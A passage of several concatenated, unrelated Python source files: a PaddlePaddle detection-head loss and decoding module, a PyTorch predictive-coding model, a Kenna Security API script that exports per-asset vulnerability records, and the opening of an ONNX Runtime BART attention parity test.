            self.stem_reg.append(ESEAttn(in_c, act=act))
        # pred head
        self.pred_cls = nn.LayerList()
        self.pred_reg = nn.LayerList()
        for in_c in self.in_channels:
            self.pred_cls.append(
                nn.Conv2D(
                    in_c, self.num_classes, 3, padding=1))
            self.pred_reg.append(
                nn.Conv2D(
                    in_c, 4 * (self.reg_max + 1), 3, padding=1))
        # projection conv: converts the per-side bin distribution into its
        # expected value (weights fixed to linspace in _init_weights).
        self.proj_conv = nn.Conv2D(self.reg_max + 1, 1, 1, bias_attr=False)
        self._init_weights()

    @classmethod
    def from_config(cls, cfg, input_shape):
        # Infer in_channels from the upstream neck's output shapes.
        return {'in_channels': [i.channels for i in input_shape], }

    def _init_weights(self):
        """Initialize prediction convs and freeze the DFL projection weights."""
        # Classification bias initialized to a small prior probability.
        bias_cls = bias_init_with_prob(0.01)
        for cls_, reg_ in zip(self.pred_cls, self.pred_reg):
            constant_(cls_.weight)
            constant_(cls_.bias, bias_cls)
            constant_(reg_.weight)
            constant_(reg_.bias, 1.0)
        # proj = [0, 1, ..., reg_max]; matmul with a softmaxed distribution
        # yields the expected bin index (the decoded side distance).
        self.proj = paddle.linspace(0, self.reg_max, self.reg_max + 1)
        self.proj_conv.weight.set_value(
            self.proj.reshape([1, self.reg_max + 1, 1, 1]))
        self.proj_conv.weight.stop_gradient = True
        if self.eval_input_size:
            # Fixed eval size: cache anchors once instead of per forward.
            anchor_points, stride_tensor = self._generate_anchors()
            self.register_buffer('anchor_points', anchor_points)
            self.register_buffer('stride_tensor', stride_tensor)

    def forward_train(self, feats, targets):
        """Training forward: per-level cls/reg predictions, then the loss."""
        anchors, anchor_points, num_anchors_list, stride_tensor = \
            generate_anchors_for_grid_cell(
                feats, self.fpn_strides, self.grid_cell_scale,
                self.grid_cell_offset)

        cls_score_list, reg_distri_list = [], []
        for i, feat in enumerate(feats):
            avg_feat = F.adaptive_avg_pool2d(feat, (1, 1))
            # Residual connection around the classification stem only.
            cls_logit = self.pred_cls[i](self.stem_cls[i](feat, avg_feat) +
                                         feat)
            reg_distri = self.pred_reg[i](self.stem_reg[i](feat, avg_feat))
            # cls and reg
            cls_score = F.sigmoid(cls_logit)
            cls_score_list.append(cls_score.flatten(2).transpose([0, 2, 1]))
            reg_distri_list.append(reg_distri.flatten(2).transpose([0, 2, 1]))
        # Concatenate all levels along the anchor dimension.
        cls_score_list = paddle.concat(cls_score_list, axis=1)
        reg_distri_list = paddle.concat(reg_distri_list, axis=1)

        return self.get_loss([
            cls_score_list, reg_distri_list, anchors, anchor_points,
            num_anchors_list, stride_tensor
        ], targets)

    def _generate_anchors(self, feats=None):
        """Build eval-time anchor centers and per-point strides.

        Uses feature-map shapes when `feats` is given, otherwise derives
        grid sizes from the fixed eval_input_size.
        """
        # just use in eval time
        anchor_points = []
        stride_tensor = []
        for i, stride in enumerate(self.fpn_strides):
            if feats is not None:
                _, _, h, w = feats[i].shape
            else:
                h = int(self.eval_input_size[0] / stride)
                w = int(self.eval_input_size[1] / stride)
            # Cell centers in grid units (offset is typically 0.5).
            shift_x = paddle.arange(end=w) + self.grid_cell_offset
            shift_y = paddle.arange(end=h) + self.grid_cell_offset
            shift_y, shift_x = paddle.meshgrid(shift_y, shift_x)
            anchor_point = paddle.cast(
                paddle.stack(
                    [shift_x, shift_y], axis=-1), dtype='float32')
            anchor_points.append(anchor_point.reshape([-1, 2]))
            stride_tensor.append(
                paddle.full(
                    [h * w, 1], stride, dtype='float32'))
        anchor_points = paddle.concat(anchor_points)
        stride_tensor = paddle.concat(stride_tensor)
        return anchor_points, stride_tensor

    def forward_eval(self, feats):
        """Eval forward: returns class scores, decoded side distances
        (expected values of the bin distribution), anchors and strides."""
        if self.eval_input_size:
            anchor_points, stride_tensor = self.anchor_points, self.stride_tensor
        else:
            anchor_points, stride_tensor = self._generate_anchors(feats)
        cls_score_list, reg_dist_list = [], []
        for i, feat in enumerate(feats):
            b, _, h, w = feat.shape
            l = h * w
            avg_feat = F.adaptive_avg_pool2d(feat, (1, 1))
            cls_logit = self.pred_cls[i](self.stem_cls[i](feat, avg_feat) +
                                         feat)
            reg_dist = self.pred_reg[i](self.stem_reg[i](feat, avg_feat))
            reg_dist = reg_dist.reshape([-1, 4, self.reg_max + 1, l]).transpose(
                [0, 2, 1, 3])
            # softmax over bins, then the fixed projection conv takes the
            # expectation -> one distance per side.
            reg_dist = self.proj_conv(F.softmax(reg_dist, axis=1))
            # cls and reg
            cls_score = F.sigmoid(cls_logit)
            cls_score_list.append(cls_score.reshape([b, self.num_classes, l]))
            reg_dist_list.append(reg_dist.reshape([b, 4, l]))

        cls_score_list = paddle.concat(cls_score_list, axis=-1)
        reg_dist_list = paddle.concat(reg_dist_list, axis=-1)

        return cls_score_list, reg_dist_list, anchor_points, stride_tensor

    def forward(self, feats, targets=None):
        """Dispatch to the training or eval path based on self.training."""
        assert len(feats) == len(self.fpn_strides), \
            "The size of feats is not equal to size of fpn_strides"

        if self.training:
            return self.forward_train(feats, targets)
        else:
            return self.forward_eval(feats)

    @staticmethod
    def _focal_loss(score, label, alpha=0.25, gamma=2.0):
        """Focal loss (sum-reduced); alpha <= 0 disables class balancing."""
        weight = (score - label).pow(gamma)
        if alpha > 0:
            alpha_t = alpha * label + (1 - alpha) * (1 - label)
            weight *= alpha_t
        loss = F.binary_cross_entropy(
            score, label, weight=weight, reduction='sum')
        return loss

    @staticmethod
    def _varifocal_loss(pred_score, gt_score, label, alpha=0.75, gamma=2.0):
        """Varifocal loss: negatives down-weighted by pred^gamma, positives
        weighted by their (IoU-aware) gt_score."""
        weight = alpha * pred_score.pow(gamma) * (1 - label) + gt_score * label
        loss = F.binary_cross_entropy(
            pred_score, gt_score, weight=weight, reduction='sum')
        return loss

    def _bbox_decode(self, anchor_points, pred_dist):
        """Bin distribution -> expected side distances -> xyxy boxes."""
        b, l, _ = get_static_shape(pred_dist)
        pred_dist = F.softmax(pred_dist.reshape([b, l, 4, self.reg_max + 1
                                                 ])).matmul(self.proj)
        return batch_distance2bbox(anchor_points, pred_dist)

    def _bbox2distance(self, points, bbox):
        """xyxy boxes -> per-side distances from anchor points, clipped so
        that target_left + 1 in _df_loss stays a valid bin index."""
        x1y1, x2y2 = paddle.split(bbox, 2, -1)
        lt = points - x1y1
        rb = x2y2 - points
        return paddle.concat([lt, rb], -1).clip(0, self.reg_max - 0.01)

    def _df_loss(self, pred_dist, target):
        """Distribution-focal term: cross-entropy against the two integer
        bins bracketing the continuous target, linearly weighted."""
        target_left = paddle.cast(target, 'int64')
        target_right = target_left + 1
        weight_left = target_right.astype('float32') - target
        weight_right = 1 - weight_left
        loss_left = F.cross_entropy(
            pred_dist, target_left, reduction='none') * weight_left
        loss_right = F.cross_entropy(
            pred_dist, target_right, reduction='none') * weight_right
        return (loss_left + loss_right).mean(-1, keepdim=True)

    def _bbox_loss(self, pred_dist, pred_bboxes, anchor_points, assigned_labels,
                   assigned_bboxes, assigned_scores, assigned_scores_sum):
        """L1 + GIoU + DFL over positive anchors (zeros when none assigned)."""
        # select positive samples mask
        mask_positive = (assigned_labels != self.num_classes)
        num_pos = mask_positive.sum()
        # pos/neg loss
        if num_pos > 0:
            # l1 + iou
            bbox_mask = mask_positive.unsqueeze(-1).tile([1, 1, 4])
            pred_bboxes_pos = paddle.masked_select(pred_bboxes,
                                                   bbox_mask).reshape([-1, 4])
            assigned_bboxes_pos = paddle.masked_select(
                assigned_bboxes, bbox_mask).reshape([-1, 4])
            # Per-anchor weight: the assigned (quality) score.
            bbox_weight = paddle.masked_select(
                assigned_scores.sum(-1), mask_positive).unsqueeze(-1)

            loss_l1 = F.l1_loss(pred_bboxes_pos, assigned_bboxes_pos)

            loss_iou = self.iou_loss(pred_bboxes_pos,
                                     assigned_bboxes_pos) * bbox_weight
            loss_iou = loss_iou.sum() / assigned_scores_sum

            dist_mask = mask_positive.unsqueeze(-1).tile(
                [1, 1, (self.reg_max + 1) * 4])
            pred_dist_pos = paddle.masked_select(
                pred_dist, dist_mask).reshape([-1, 4, self.reg_max + 1])
            assigned_ltrb = self._bbox2distance(anchor_points, assigned_bboxes)
            assigned_ltrb_pos = paddle.masked_select(
                assigned_ltrb, bbox_mask).reshape([-1, 4])
            loss_dfl = self._df_loss(pred_dist_pos,
                                     assigned_ltrb_pos) * bbox_weight
            loss_dfl = loss_dfl.sum() / assigned_scores_sum
        else:
            loss_l1 = paddle.zeros([1])
            loss_iou = paddle.zeros([1])
            loss_dfl = paddle.zeros([1])
        return loss_l1, loss_iou, loss_dfl

    def get_loss(self, head_outs, gt_meta):
        """Assign targets (ATSS early, TAL later) and compute the total loss.

        Returns a dict with 'loss' plus the individual cls/iou/dfl/l1 terms.
        """
        pred_scores, pred_distri, anchors,\
        anchor_points, num_anchors_list, stride_tensor = head_outs

        # Decode in stride-normalized coordinates.
        anchor_points_s = anchor_points / stride_tensor
        pred_bboxes = self._bbox_decode(anchor_points_s, pred_distri)

        gt_labels = gt_meta['gt_class']
        gt_bboxes = gt_meta['gt_bbox']
        pad_gt_mask = gt_meta['pad_gt_mask']
        # label assignment
        if gt_meta['epoch_id'] < self.static_assigner_epoch:
            assigned_labels, assigned_bboxes, assigned_scores = \
                self.static_assigner(
                    anchors,
                    num_anchors_list,
                    gt_labels,
                    gt_bboxes,
                    pad_gt_mask,
                    bg_index=self.num_classes,
                    pred_bboxes=pred_bboxes.detach() * stride_tensor)
            alpha_l = 0.25
        else:
            assigned_labels, assigned_bboxes, assigned_scores = \
                self.assigner(
                    pred_scores.detach(),
                    pred_bboxes.detach() * stride_tensor,
                    anchor_points,
                    num_anchors_list,
                    gt_labels,
                    gt_bboxes,
                    pad_gt_mask,
                    bg_index=self.num_classes)
            alpha_l = -1
        # rescale bbox
        assigned_bboxes /= stride_tensor
        # cls loss
        if self.use_varifocal_loss:
            one_hot_label = F.one_hot(assigned_labels, self.num_classes)
            loss_cls = self._varifocal_loss(pred_scores, assigned_scores,
                                            one_hot_label)
        else:
            loss_cls = self._focal_loss(pred_scores, assigned_scores, alpha_l)

        assigned_scores_sum = assigned_scores.sum()
        if paddle_distributed_is_initialized():
            # Normalize by the mean positive mass across workers.
            paddle.distributed.all_reduce(assigned_scores_sum)
            assigned_scores_sum = paddle.clip(
                assigned_scores_sum / paddle.distributed.get_world_size(),
                min=1)
        loss_cls /= assigned_scores_sum

        loss_l1, loss_iou, loss_dfl = \
            self._bbox_loss(pred_distri, pred_bboxes, anchor_points_s,
                            assigned_labels, assigned_bboxes, assigned_scores,
                            assigned_scores_sum)

        loss = self.loss_weight['class'] * loss_cls + \
               self.loss_weight['iou'] * loss_iou + \
               self.loss_weight['dfl'] * loss_dfl
        out_dict = {
            'loss': loss,
            'loss_cls': loss_cls,
            'loss_iou': loss_iou,
            'loss_dfl': loss_dfl,
            'loss_l1': loss_l1,
        }
        return out_dict

    def post_process(self, head_outs, img_shape, scale_factor):
        """Decode eval outputs to image-space boxes and (optionally) run NMS."""
        pred_scores, pred_dist, anchor_points, stride_tensor = head_outs
        pred_bboxes = batch_distance2bbox(anchor_points,
                                          pred_dist.transpose([0, 2, 1]))
        pred_bboxes *= stride_tensor
        # scale bbox to origin
        scale_y, scale_x = paddle.split(scale_factor, 2, axis=-1)
        scale_factor = paddle.concat(
            [scale_x, scale_y, scale_x, scale_y], axis=-1).reshape([-1, 1, 4])
        pred_bboxes /= scale_factor
        if self.exclude_nms:
            # `exclude_nms=True` just use in benchmark
            return pred_bboxes.sum(), pred_scores.sum()
        else:
            bbox_pred, bbox_num, _ = self.nms(pred_bboxes, pred_scores)
            return bbox_pred, bbox_num
|
import logging
import torch
from pybrid import utils
from pybrid.models.base import BaseModel
from pybrid.layers import FCLayer
class HybridModel(BaseModel):
    """Predictive-coding network with an additional amortised inference path.

    ``layers`` form the generative (top-down) model; ``amort_layers`` run in
    the opposite direction and are used to initialise the latent activities
    ``mus`` in a single feed-forward sweep.
    """

    def __init__(
        self,
        nodes,
        amort_nodes,
        act_fn,
        mu_dt=0.01,
        use_bias=False,
        kaiming_init=False,
    ):
        # NOTE(review): BaseModel.__init__ is never invoked here — confirm the
        # base class requires no initialisation.
        self.nodes = nodes
        self.amort_nodes = amort_nodes
        self.mu_dt = mu_dt  # step size for the iterative mu updates
        self.num_nodes = len(nodes)
        self.num_layers = len(nodes) - 1
        self.total_params = 0
        self.layers = []
        self.amort_layers = []
        for l in range(self.num_layers):
            # Final generative layer is linear; hidden layers use act_fn.
            layer_act_fn = utils.Linear() if (l == self.num_layers - 1) else act_fn
            layer = FCLayer(
                in_size=nodes[l],
                out_size=nodes[l + 1],
                act_fn=layer_act_fn,
                use_bias=use_bias,
                kaiming_init=kaiming_init,
            )
            self.layers.append(layer)
            # Counts a bias vector per layer even when use_bias is False
            # (kept as-is for backward compatibility of avg-error scaling).
            self.total_params = self.total_params + ((nodes[l] * nodes[l + 1]) + nodes[l + 1])

            amort_layer = FCLayer(
                in_size=amort_nodes[l],
                out_size=amort_nodes[l + 1],
                act_fn=layer_act_fn,  # TODO: amortised net reuses the generative activation
                use_bias=use_bias,
                kaiming_init=kaiming_init,
                is_amortised=True,
            )
            self.amort_layers.append(amort_layer)

        # Reference statistics used later by normalize_weights().
        self.mean_weights, self.mean_biases = self.get_weight_stats()

    def reset(self):
        """Clear all per-batch state (predictions, errors, activities)."""
        self.preds = [[] for _ in range(self.num_nodes)]
        self.errs = [[] for _ in range(self.num_nodes)]
        self.q_preds = [[] for _ in range(self.num_nodes)]
        self.q_errs = [[] for _ in range(self.num_nodes)]
        self.mus = [[] for _ in range(self.num_nodes)]

    def reset_mu(self, batch_size, init_std=0.05):
        """Initialise latent activities with small Gaussian noise."""
        for l in range(self.num_layers):
            tensor = torch.empty(batch_size, self.layers[l].in_size).normal_(mean=0, std=init_std)
            self.mus[l] = utils.set_tensor(tensor)

    def set_img_batch(self, img_batch):
        # The image clamps the bottom (last) layer of the generative model.
        self.mus[-1] = img_batch.clone()

    def set_img_batch_amort(self, img_batch):
        # The amortised network consumes the image at its input (index 0).
        self.q_preds[0] = img_batch.clone()

    def set_label_batch(self, label_batch):
        # The label clamps the top (first) layer of the generative model.
        self.mus[0] = label_batch.clone()

    def forward(self, val):
        """Run the amortised (image -> label) network."""
        for layer in self.amort_layers:
            val = layer.forward(val)
        return val

    def backward(self, val):
        """Run the generative (label -> image) network."""
        for layer in self.layers:
            val = layer.forward(val)
        return val

    def forward_mu(self):
        """Propagate q_preds through the amortised net and copy them (reversed)
        into the generative activities ``mus``."""
        for l in range(1, self.num_nodes):
            self.q_preds[l] = self.amort_layers[l - 1].forward(self.q_preds[l - 1])
        mus = self.q_preds[::-1]
        for l in range(self.num_nodes):
            self.mus[l] = mus[l].clone()

    def backward_mu(self):
        """Initialise intermediate activities by a generative sweep from the label."""
        for l in range(1, self.num_layers):
            self.mus[l] = self.layers[l - 1].forward(self.mus[l - 1])

    def train_batch(
        self,
        img_batch,
        label_batch,
        num_iters=20,
        init_std=0.05,
        fixed_preds=False,
        use_amort=True,
        thresh=None,
        no_backward=False,
    ):
        """Run inference on one batch, then accumulate weight gradients.

        Returns (iterations run, list of average errors per iteration).
        """
        self.reset()
        if use_amort:
            # Amortised initialisation of the latents.
            self.set_img_batch_amort(img_batch)
            self.forward_mu()
            self.set_img_batch(img_batch)
        else:
            if not no_backward:
                # Generative initialisation from the label.
                self.set_label_batch(label_batch)
                self.backward_mu()
                self.set_img_batch(img_batch)
            else:
                # Random initialisation.
                self.reset_mu(img_batch.size(0), init_std)
                self.set_img_batch(img_batch)
        self.set_label_batch(label_batch)
        num_iter, avg_errs = self.train_updates(num_iters, fixed_preds=fixed_preds, thresh=thresh)
        self.update_grads()
        if use_amort:
            self.update_amort_grads()
        return num_iter, avg_errs

    def test_batch(
        self,
        img_batch,
        num_iters=100,
        init_std=0.05,
        fixed_preds=False,
        use_amort=True,
        thresh=None,
    ):
        """Infer the label for one image batch; returns (label, iters, errors)."""
        self.reset()
        if use_amort:
            self.set_img_batch_amort(img_batch)
            self.forward_mu()
        else:
            self.reset_mu(img_batch.size(0), init_std)
        self.set_img_batch(img_batch)
        num_iter, avg_errs = self.test_updates(num_iters, fixed_preds=fixed_preds, thresh=thresh)
        return self.mus[0], num_iter, avg_errs

    def train_updates(self, num_iters, fixed_preds=False, thresh=None):
        """Relax latent activities with both image and label clamped."""
        for n in range(1, self.num_nodes):
            self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
            self.errs[n] = self.mus[n] - self.preds[n]

        avg_errs = []
        avg_err = self.get_errors()[0] / self.total_params
        avg_errs.append(avg_err)

        itr = 0
        for itr in range(num_iters):
            # Only the intermediate layers move; endpoints are clamped.
            for l in range(1, self.num_layers):
                delta = self.layers[l].backward(self.errs[l + 1]) - self.errs[l]
                self.mus[l] = self.mus[l] + self.mu_dt * (2 * delta)

            for n in range(1, self.num_nodes):
                if not fixed_preds:
                    self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
                self.errs[n] = self.mus[n] - self.preds[n]

            avg_err = self.get_errors()[0] / self.total_params
            avg_errs.append(avg_err)
            if thresh is not None and avg_err < thresh:
                break
        return itr, avg_errs

    def test_updates(self, num_iters, fixed_preds=False, thresh=None):
        """Relax latent activities with only the image clamped (label free)."""
        for n in range(1, self.num_nodes):
            self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
            self.errs[n] = self.mus[n] - self.preds[n]

        avg_errs = []
        avg_err = self.get_errors()[0] / self.total_params
        avg_errs.append(avg_err)

        itr = 0
        for itr in range(num_iters):
            # The top (label) layer is free during testing.
            delta = self.layers[0].backward(self.errs[1])
            self.mus[0] = self.mus[0] + self.mu_dt * (2 * delta)

            for l in range(1, self.num_layers):
                delta = self.layers[l].backward(self.errs[l + 1]) - self.errs[l]
                self.mus[l] = self.mus[l] + self.mu_dt * (2 * delta)

            for n in range(1, self.num_nodes):
                if not fixed_preds:
                    self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
                self.errs[n] = self.mus[n] - self.preds[n]

            avg_err = self.get_errors()[0] / self.total_params
            avg_errs.append(avg_err)
            if thresh is not None and avg_err < thresh:
                break
        return itr, avg_errs

    def update_grads(self):
        """Accumulate generative-layer gradients from the prediction errors."""
        for l in range(self.num_layers):
            self.layers[l].update_gradient(self.errs[l + 1])

    def update_amort_grads(self):
        """Accumulate amortised-layer gradients.

        mus are the reversed q_preds, so mus[l] pairs with q_preds[q] where
        q = num_nodes - 1 - l.
        """
        for q, l in zip(reversed(range(1, self.num_nodes)), range(self.num_layers)):
            self.q_errs[q] = self.mus[l] - self.q_preds[q]
        for l in range(self.num_layers):
            self.amort_layers[l].update_gradient(self.q_errs[l + 1])

    def get_errors(self):
        """Return (total generative error, total amortised error); skips empty slots."""
        total_err = 0
        for err in self.errs:
            if len(err) > 0:
                total_err = total_err + torch.sum(torch.abs(err)).item()
        q_total_err = 0
        for err in self.q_errs:
            if len(err) > 0:
                q_total_err = q_total_err + torch.sum(torch.abs(err)).item()
        return total_err, q_total_err

    def get_losses(self):
        """Return (generative loss, amortised loss); amortised is 0 when unused."""
        try:
            return (
                torch.sum(torch.abs(self.errs[-1])).item(),
                torch.sum(torch.abs(self.q_errs[-1])).item(),
            )
        except (TypeError, IndexError):
            # BUG FIX: was a bare `except:` that swallowed every exception,
            # including KeyboardInterrupt. q_errs[-1] is an empty list when
            # the amortised path was not run, which raises TypeError in
            # torch.abs; catch only that (and IndexError) here.
            return torch.sum(torch.abs(self.errs[-1])).item(), 0

    def get_weight_stats(self):
        """Return per-layer mean |weight| and mean |bias| of the generative net."""
        mean_abs_weights, mean_abs_biases = [], []
        for l in range(self.num_layers):
            mean_abs_weights.append(torch.mean(torch.abs(self.layers[l].weights)).item())
            mean_abs_biases.append(torch.mean(torch.abs(self.layers[l].bias)).item())
        return mean_abs_weights, mean_abs_biases

    def normalize_weights(self):
        """Rescale weights/biases back to their initial mean magnitudes."""
        for l in range(self.num_layers):
            mean_weights = torch.mean(torch.abs(self.layers[l].weights))
            self.layers[l].weights = self.layers[l].weights * self.mean_weights[l] / mean_weights
            mean_bias = torch.mean(torch.abs(self.layers[l].bias))
            self.layers[l].bias = self.layers[l].bias * self.mean_biases[l] / mean_bias

    @property
    def params(self):
        # All trainable layers, generative first.
        return self.layers + self.amort_layers

    def __str__(self):
        return f"<HybridModel> {self.nodes}"
|
<gh_stars>1-10
import os
import sys
import time
import math
import requests
# Might have to change this
base_url = "https://api.kennasecurity.com/assets"
ASSETS_PER_PAGE = 500
#
def get_asset_page(page_num):
    """Fetch one page of assets from the Kenna API and return the parsed JSON.

    Relies on the module-level ``base_url`` and ``headers``. Exits the
    process on any request failure or non-200 response.
    """
    url = base_url + "?page=" + str(page_num)

    try:
        response = requests.get(url, headers=headers)
    except Exception as exp:
        # BUG FIX: message was a plain string literal, so the {str(exp)}
        # placeholder was printed verbatim instead of the actual error.
        print(f"List Asset Error: {str(exp)}")
        sys.exit(1)

    if response.status_code != 200:
        print(f"List Asset Error: {response.status_code}")
        print(f"Messages: {response.json()['message']}")
        sys.exit(1)

    return response.json()
# Obtain and write vulnerability information per asset ID into the specified file.
def get_vuln_info(api_key, vuln_url, asset_id, avfp, avlfp):
    """Fetch vulnerabilities for one asset and write them to the output files.

    Writes each vulnerability record to ``avfp`` and a per-asset summary line
    to ``avlfp``. Returns the number of vulnerabilities found, or 0 on request
    failure so callers can safely accumulate the result.
    """
    headers = {'Accept': 'application/json',
               'Content-Type': 'application/json; charset=utf-8',
               'X-Risk-Token': api_key}
    vuln_url = "https://" + vuln_url

    try:
        response = requests.get(vuln_url, headers=headers)
        # If rate limited (HTTP 429), wait a second and retry once.
        # If it happens again, raise_for_status() errors out below.
        if response.status_code == 429:
            time.sleep(1)
            response = requests.get(vuln_url, headers=headers)
        response.raise_for_status()
    except Exception as exp:
        print(f"Get vuln info error: {str(exp)}")
        # BUG FIX: was a bare `return` (None), which broke the caller's
        # `vuln_cntr += get_vuln_info(...)` accumulation with a TypeError.
        return 0

    vulns = response.json()['vulnerabilities']
    num_vulns = len(vulns)
    print(f"Vulnerabilities for asset ID {asset_id} ({num_vulns})", file=avlfp)
    for vuln in vulns:
        print(vuln, file=avfp)

    return num_vulns
if __name__ == "__main__":
    print("Vulnerabilities per Asset by Page")

    # The API key is mandatory; fail fast when it is missing.
    api_key = os.getenv('KENNA_API_KEY')
    if api_key is None:
        print("Environment variable KENNA_API_KEY is non-existent")
        sys.exit(1)

    headers = {'X-Risk-Token': api_key,
               'Accept': "application/json"
               }

    # Open files for vulnerabilities per asset, and vulnerability info per asset ID.
    avfp = open("asset_vuln_info", "w")
    avlfp = open("asset_vuln_log", "w")

    max_allowed_pages = 20
    asset_count = 0
    page_num = 1

    # Obtain the first page to learn how many pages exist in total.
    resp_json = get_asset_page(page_num)
    meta = resp_json['meta']
    num_pages = meta['pages']
    if num_pages > max_allowed_pages:
        print(f"Number of pages = {num_pages} which exceeds the maximum allowed of {max_allowed_pages}")
        print("Will only output the first 10,000 assets.")
        num_pages = max_allowed_pages

    # Only a guess since all we know is the number of pages.
    asset_count = num_pages * ASSETS_PER_PAGE
    print(f"Will process between {asset_count - ASSETS_PER_PAGE} and {asset_count} assets.")

    asset_cntr = 0
    vuln_cntr = 0
    start_time = time.perf_counter()
    acc_start_time = start_time

    # Loop through all the assets one page at a time, and get the
    # vulnerabilities for each asset.
    while page_num <= num_pages:
        resp_json = get_asset_page(page_num)
        assets = resp_json['assets']

        # Adjust the total asset count on the (possibly short) last page.
        page_asset_count = len(assets)
        if page_asset_count < ASSETS_PER_PAGE:
            asset_count = ((page_num - 1) * ASSETS_PER_PAGE) + page_asset_count

        # Get the vulnerabilities for each asset.
        for asset in assets:
            vuln_url = asset['urls']['vulnerabilities']
            vuln_cntr += get_vuln_info(api_key, vuln_url, str(asset['id']), avfp, avlfp)
            asset_cntr += 1

            # Throttle to at most 5 API calls per second, and every 25 assets
            # report progress with an estimated time remaining.
            if asset_cntr != 0 and asset_cntr % 5 == 0:
                time_lapse = time.perf_counter() - start_time
                if time_lapse < 1.0:
                    print("\nExceeded 5 API calls per second.")
                    time.sleep(1)
                if asset_cntr % 25 == 0:
                    time_left_secs = (asset_count - asset_cntr) / (time_lapse / 5)
                    print(f"Processed {asset_cntr} assets and {vuln_cntr} vulns. ({time_left_secs:0.1f}s {time_left_secs/60:0.1f}m) \r", end='')
                start_time = time.perf_counter()

        page_num += 1

    total_time_secs = time.perf_counter() - acc_start_time
    avfp.close()
    # BUG FIX: the log file handle was never closed.
    avlfp.close()
    print(f"Processed {asset_cntr} assets and {vuln_cntr} vulns in {total_time_secs:0.1f}s ({total_time_secs/60:0.1f}m) ")
|
# --------------------------------------------------------------------------
# Copyright 2020 The HuggingFace Inc. team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import math
import numpy
import torch
from torch import Tensor, nn
from torch.nn import functional as F
from typing import Dict, List, Optional, Tuple
import os
torch.manual_seed(0)
"""
This is an example of export bart decoder attention with huggingface v3.5.1
def my_bart_attention_forward(
self,
query,
key: Tensor,
key_padding_mask: Optional[Tensor],
layer_state: Optional[List[Tensor]],
attn_mask: Optional[Tensor] = None,
output_attentions: bool=False,
use_past=torch.tensor(False),
):
static_kv: bool = self.encoder_decoder_attention
q_weight = self.q_proj.weight.transpose(0,1)
q_weight = q_weight.reshape(self.embed_dim, self.embed_dim)
kv_weight = torch.stack((self.k_v_proj.k_proj.weight.transpose(0,1), self.k_v_proj.v_proj.weight.transpose(0,1)), dim=1)
kv_weight = kv_weight.reshape(self.embed_dim, 2 * self.embed_dim)
bias = torch.stack((self.q_proj.bias, self.k_v_proj.k_proj.bias, self.k_v_proj.v_proj.bias), dim=0)
bias = bias.reshape(3 * self.embed_dim)
self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
if static_kv:
key_cache, value_cache = enc_dec_p_k, enc_dec_p_v
else:
key_cache, value_cache = self_p_k, self_p_v
if not static_kv:
key_padding_mask = torch.tensor(False)
attn_output, new_key_cache, new_value_cache = torch.ops.onnxruntime.DecoderAttention(
query,
key,
q_weight,
kv_weight,
bias,
key_padding_mask,
key_cache,
value_cache,
torch.tensor(static_kv), #static_kv
use_past, #use_past
torch.tensor(True), #has_layer_state
torch.tensor(static_kv), #has_key_padding_mask
self.num_heads)
if not use_past:
if self.encoder_decoder_attention:
layer_state[2] = new_key_cache
layer_state[3] = new_value_cache
else:
layer_state[0] = new_key_cache
layer_state[1] = new_value_cache
else:
if not self.encoder_decoder_attention:
layer_state[0] = new_key_cache
layer_state[1] = new_value_cache
attn_output = self.out_proj(attn_output)
return attn_output, None, layer_state
"""
class Config:
    """Dimension bundle for one attention parity-test case."""

    # Class-level defaults, kept for compatibility with code that reads these
    # attributes off the class itself.
    batch_size = 0
    sequence_length = 0
    kv_sequence_length = 0
    num_heads = 0
    head_size = 0
    embed_dim = 0

    def __init__(self, b, s, s2, n, h):
        (self.batch_size, self.sequence_length,
         self.kv_sequence_length) = b, s, s2
        self.num_heads, self.head_size = n, h
        # Model width is heads times per-head size.
        self.embed_dim = n * h
class AttentionProjection(nn.Module):
    """Computes (and optionally reuses cached) key/value projections for attention."""

    def __init__(self, num_heads, head_dim, embed_dim, bias=True):
        super().__init__()
        self.num_heads = num_heads
        self.head_dim = head_dim
        self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)

    def shape_state(self, state, batch_size):
        """Flatten a cached (B, N, T, H) state into (B*N, T, H)."""
        return state.view(batch_size * self.num_heads, -1, self.head_dim)

    def shape_proj(self, proj, batch_size):
        """Reshape a fresh (T, B, E) projection into (B*N, T, H)."""
        return proj.view(-1, batch_size * self.num_heads, self.head_dim).transpose(0, 1)

    def forward(
        self,
        query,
        key,
        layer_state: Optional[List[Tensor]],
        encoder_decoder_attention: bool,
        use_past=torch.tensor(False),
    ):
        bsz = torch._shape_as_tensor(query)[1]
        if layer_state is None or not use_past:
            # No usable cache: project from scratch. Self-attention projects
            # the query sequence; cross-attention projects the encoder key.
            source = key if encoder_decoder_attention else query
            k = self.shape_proj(self.k_proj(source), bsz)
            v = self.shape_proj(self.v_proj(source), bsz)
        else:
            self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
            if encoder_decoder_attention:
                # Cross-attention cache is static: reuse it as-is.
                k = self.shape_state(enc_dec_p_k, bsz)
                v = self.shape_state(enc_dec_p_v, bsz)
            else:
                # Self-attention: project the new step and append to the cache.
                k = self.shape_proj(self.k_proj(query), bsz)
                v = self.shape_proj(self.v_proj(query), bsz)
                k = torch.cat([self.shape_state(self_p_k, bsz), k], dim=1)
                v = torch.cat([self.shape_state(self_p_v, bsz), v], dim=1)
        return k, v
class AttentionForONNX(nn.Module):
    """Multi-headed attention from 'Attention Is All You Need' paper.

    Provides two equivalent implementations for parity testing: ``forward``
    (pure PyTorch) and ``ORT_forward`` (ONNXRuntime DecoderAttention op).
    """
    def __init__(
        self,
        embed_dim,
        num_heads,
        dropout=0.0,
        bias=True,
        encoder_decoder_attention=False, # otherwise self_attention
    ):
        super().__init__()
        self.embed_dim = embed_dim
        self.num_heads = num_heads
        self.dropout = dropout
        self.head_dim = embed_dim // num_heads
        assert self.head_dim * num_heads == self.embed_dim, "embed_dim must be divisible by num_heads"
        self.scaling = self.head_dim ** -0.5

        self.encoder_decoder_attention = encoder_decoder_attention
